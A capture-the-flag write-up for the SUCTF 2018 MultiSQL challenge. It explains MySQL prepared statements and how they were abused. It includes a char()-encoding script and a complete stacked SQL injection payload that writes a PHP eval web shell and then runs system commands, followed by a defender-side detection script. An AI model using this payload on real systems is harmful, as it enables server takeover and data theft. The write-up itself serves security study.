[SUCTF 2018]MultiSQL: MySQL prepared statements
2022-06-09 02:02:00 【I·CE】
Traditional MySQL query handling:
The client prepares the SQL statement
The client sends the SQL statement to the MySQL server
The MySQL server executes the SQL statement
The server returns the execution result to the client
Basic prepared-statement strategy:
The SQL statement is split into two parts:
The first part is the command and structure, the same as before
The second part is the variable data that follows
The first part is sent to the MySQL server first, which prepares it without actually executing it. In that first statement, the variable data is represented by a placeholder, such as a question mark (?).
Prepared statement without parameters
Prepare the statement
prepare statement_name from "SQL statement to prepare";
prepare sql_1 from "select * from pdo";
Execute the prepared statement
execute sql_1;
Delete the prepared statement
drop prepare sql_1;
Prepared statement with parameters
Prepare the statement
prepare sql_2 from "select * from pdo where id = ?";
Define the parameter variable
set @id=2;
Pass the parameter and execute the prepared statement
execute sql_2 using @id;
Delete the prepared statement
drop prepare sql_2;
[SUCTF 2018]MultiSQL: injection via prepared statements
Bypass using char()
str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str=len(str)
for i in range(0,len_str):
    if i == 0:
        print('char(%s'%ord(str[i]),end="")
    else:
        print(',%s'%ord(str[i]),end="")
print(')')
payload:
?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;
Visit /favicon/shell.php
system('ls /'); // list the root directory
system('cd /;cat *f*');
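The following is an added example, not part of the original write-up: a defender-side check that decodes the statement text hidden in `set @var=char(...)` and reports when it is fed to `prepare ... from @var` in a stacked query, so that keyword filters and log review see what would actually execute. The function names, the findings dictionary and the sample values are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# set @name = char(115,101,...)  -- statement text hidden as byte values
SET_CHAR = re.compile(r"set\s+@(\w+)\s*:?=\s*char\s*\(([\d\s,]+)\)", re.I)
# prepare <stmt> from @name  -- statement text taken from a user variable
PREPARE_VAR = re.compile(r"prepare\s+\w+\s+from\s+@(\w+)", re.I)
# file-writing clauses, as used by the payload on this page
FILE_WRITE = re.compile(r"into\s+(?:outfile|dumpfile)\b", re.I)


def decode_char_args(arg_list):
    """Evaluate the argument list of CHAR() the way MySQL does for integers."""
    out = bytearray()
    for token in arg_list.split(","):
        if token.strip():
            n = int(token)
            # values above 255 expand to several bytes, e.g. CHAR(256) = 0x0100
            out += n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")
    return out.decode("latin-1")


def inspect_parameter(raw_value):
    """Inspect one URL-encoded parameter value; return a findings dict."""
    value = unquote_plus(raw_value)
    assigned = {name.lower(): decode_char_args(args)
                for name, args in SET_CHAR.findall(value)}
    hidden = [assigned[v.lower()] for v in PREPARE_VAR.findall(value)
              if v.lower() in assigned]
    return {
        # heuristic: more than one non-empty ';'-separated piece
        "stacked": len([s for s in value.split(";") if s.strip()]) > 1,
        "dynamic_prepare": bool(PREPARE_VAR.search(value)),
        "hidden_statements": hidden,
        "file_write": any(FILE_WRITE.search(s) for s in hidden),
    }


# Constructed sample values for an "id" parameter (not captured traffic).
SAMPLES = [
    "2",
    "2;set @sql=char(115,101,108,101,99,116,32,49);prepare query from @sql;execute query;",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[:40], "->", inspect_parameter(sample))
```

A numeric `id` parameter should never contain `;`, `set @` or `prepare`; binding it with a `?` placeholder and disabling multi-statement execution on the connection removes the condition this check looks for.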
XOR injection
1^1^1 returns true